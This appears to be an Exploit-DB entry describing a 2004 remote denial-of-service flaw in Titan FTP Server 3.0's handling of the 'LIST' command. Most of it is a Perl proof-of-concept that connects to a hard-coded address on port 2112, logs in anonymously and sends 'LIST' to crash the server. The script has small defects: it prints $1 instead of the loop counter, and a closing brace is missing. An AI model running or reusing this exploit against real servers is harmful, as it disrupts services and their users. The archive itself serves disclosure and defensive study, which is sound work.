Titan FTP Server 3.0 - 'LIST' Denial of Service

EDB-ID:

24080


Author:

storm

Type:

dos


Platform:

Windows

Date:

2004-05-04


source: https://www.securityfocus.com/bid/10272/info

Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.

A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.

#!/usr/bin/perl
# Test for Titan FTP server security vulnerability

use IO::Socket;

$host = "192.168.1.243";

my @combination;
$combination[0] = "LIST \r\n";

for (my $i = 0; $combination[$i] ; $i++)
{
 print "Combination: $1\n";

 $remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2112",
     );
 unless ($remote) { die "cannot connect to ftp daemon on $host" }

 print "connected\n";
 while (<$remote>)
 {
  print $_;
  if (/220 /)
  {
   last;
  }
 }

 $remote->autoflush(1);

 my $ftp = "USER anonymous\r\n";

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/331 /)
  {
   last;
  }
 }

 $ftp = "PASS a\@b.com\r\n";
 print $remote $ftp;
 print $ftp;
 
 while (<$remote>)
 {
  print $_;
  if (/230 /)
  {
   last;
  }
 }
 
 $ftp = $combination[$i];

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/150 /)
  {
   last;
  }
 

 close $remote;
}